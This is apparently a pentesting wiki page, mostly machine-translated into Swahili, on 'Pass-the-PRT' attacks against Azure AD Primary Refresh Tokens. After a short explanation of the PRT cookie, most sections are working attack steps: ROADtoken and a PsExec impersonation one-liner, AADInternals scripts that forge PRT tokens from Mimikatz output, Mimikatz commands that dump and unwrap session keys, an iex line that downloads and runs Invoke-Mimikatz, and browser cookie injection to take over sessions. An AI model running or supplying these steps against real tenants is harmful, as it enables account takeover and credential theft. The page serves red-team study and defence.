Az - Pass the PRT

Nini maana ya PRT

Angalia kama una PRT

Dsregcmd.exe /status

Katika sehemu ya SSO State, unapaswa kuona AzureAdPrt imewekwa kwenye NDIO.

Katika matokeo sawa unaweza pia kuona kama kifaa kimeunganishwa na Azure (katika uwanja AzureAdJoined):

PRT Cookie

Keki ya PRT kwa kweli inaitwa x-ms-RefreshTokenCredential na ni JSON Web Token (JWT). JWT ina sehemu 3, header, payload na signature, zilizogawanywa na . na zote zimeandikwa kwa url-safe base64. Keki ya kawaida ya PRT ina header na mwili ufuatao:

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

The actual Primary Refresh Token (PRT) is encapsulated within the refresh_token, which is encrypted by a key under the control of Azure AD, rendering its contents opaque and undecryptable to us. The field is_primary signifies the encapsulation of the primary refresh token within this token. To ensure that the cookie remains bound to the specific login session it was intended for, the request_nonce is transmitted from the logon.microsoftonline.com page.

PRT Cookie flow using TPM

The LSASS process will send to the TPM the KDF context, and the TPM will used session key (gathered when the device was registered in AzureAD and stored in the TPM) and the previous context to derivate a key, and this derived key is used to sign the PRT cookie (JWT).

The KDF context is a nonce from AzureAD and the PRT creating a JWT mixed with a context (random bytes).

Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to request derived keys from new contexts and use the generated keys to sign Cookies.

PRT Abuse Scenarios

As a regular user it's possible to request PRT usage by asking LSASS for SSO data. This can be done like native apps which request tokens from Web Account Manager (token broker). WAM pasess the request to LSASS, which asks for tokens using signed PRT assertion. Or it can be down with browser based (web) flows where a PRT cookie is used as header to authenticate requests to Azure AS login pages.

As SYSTEM you could steal the PRT if not protected by TPM or interact with PRT keys in LSASS using crypto APIs.

Pass-the-PRT Attack Examples

Attack - ROADtoken

For more info about this way check this post. ROADtoken will run BrowserCore.exe from the right directory and use it to obtain a PRT cookie. This cookie can then be used with ROADtools to authenticate and obtain a persistent refresh token.

To generate a valid PRT cookie the first thing you need is a nonce. You can get this with:

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Au kutumia roadrecon:

roadrecon auth prt-init

Kisha unaweza kutumia roadtoken kupata PRT mpya (endesha katika zana kutoka kwa mchakato wa mtumiaji kushambulia):

.\ROADtoken.exe <nonce>

Kama oneliner:

Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Kisha unaweza kutumia keki iliyoandaliwa ili kuunda tokeni za kuingia ukitumia Azure AD Graph au Microsoft Graph:

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>

Attack - Using roadrecon

Attack - Using AADInternals and a leaked PRT

Get-AADIntUserPRTToken inapata token ya PRT ya mtumiaji kutoka kwa kompyuta iliyojiunga na Azure AD au Hybrid. Inatumia BrowserCore.exe kupata token ya PRT.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Au ikiwa una thamani kutoka Mimikatz unaweza pia kutumia AADInternals kuunda tokeni:

# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token ac cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

Nenda kwenye https://login.microsoftonline.com, safisha vidakuzi vyote vya login.microsoftonline.com na uingize kidakuzi kipya.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Kisha nenda kwenye https://portal.azure.com

Shambulio - Mimikatz

Hatua

1. PRT (Primary Refresh Token) inachukuliwa kutoka LSASS (Local Security Authority Subsystem Service) na kuhifadhiwa kwa matumizi ya baadaye.

2. Funguo ya Kikao inachukuliwa ifuatayo. Ikitolewa awali na kisha kuimarishwa tena na kifaa cha ndani, inahitaji ufichuzi kwa kutumia DPAPI masterkey. Taarifa za kina kuhusu DPAPI (Data Protection API) zinaweza kupatikana katika rasilimali hizi: HackTricks na kwa kuelewa matumizi yake, rejelea Pass-the-cookie attack.

3. Baada ya ufichuzi wa Funguo ya Kikao, funguo iliyotokana na muktadha wa PRT inapatikana. Hizi ni muhimu kwa kuunda kuki ya PRT. Kwa haswa, funguo iliyotokana inatumika kwa kusaini JWT (JSON Web Token) inayounda kuki. Maelezo ya kina kuhusu mchakato huu yameandikwa na Dirk-jan, yanapatikana hapa.

Unaweza kupata maelezo ya kina ya mchakato uliofanywa ili kuchukua maelezo haya hapa: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

Unaweza kutumia mimikatz kuchukua PRT:

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)

Nakili sehemu iliyoandikwa Prt na uihifadhi. Pia toa funguo ya kikao (the KeyValue ya uwanja wa ProofOfPossesionKey) ambayo unaweza kuona ikiwa imeangaziwa hapa chini. Hii imefungwa na tutahitaji kutumia funguo zetu za DPAPI kuzifungua.

Ili kufungua funguo ya kikao unahitaji kuinua mamlaka yako hadi SYSTEM ili kukimbia chini ya muktadha wa kompyuta ili uweze kutumia funguo ya DPAPI kufungua. Unaweza kutumia amri zifuatazo kufanya hivyo:

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Chaguo 1 - Mimikatz Kamili

• Sasa unataka kunakili thamani ya Muktadha:

• Na thamani ya ufunguo iliyotokana:

• Hatimaye unaweza kutumia taarifa hizi zote kuunda vidakuzi vya PRT:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

• Nenda kwenye https://login.microsoftonline.com, safisha vidakuzi vyote kwa login.microsoftonline.com na uingize kidakuzi kipya.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

• Kisha nenda kwenye https://portal.azure.com

Chaguo la 2 - roadrecon kutumia PRT

• Fanya upya PRT kwanza, ambayo itahifadhiwa katika roadtx.prt:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

• Sasa tunaweza kuomba tokeni kwa kutumia kivinjari cha mwingiliano na roadtx browserprtauth. Ikiwa tutatumia amri ya roadtx describe, tunaona tokeni ya ufikiaji inajumuisha madai ya MFA kwa sababu PRT niliyotumia katika kesi hii pia ilikuwa na madai ya MFA.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Chaguo la 3 - roadrecon kutumia funguo zilizotokana

Kuwa na muktadha na funguo zilizotokana zilizotolewa na mimikatz, inawezekana kutumia roadrecon kuunda cookie mpya iliyosainiwa na:

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>

Marejeo

• https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

• https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/

• https://www.youtube.com/watch?v=x609c-MUZ_g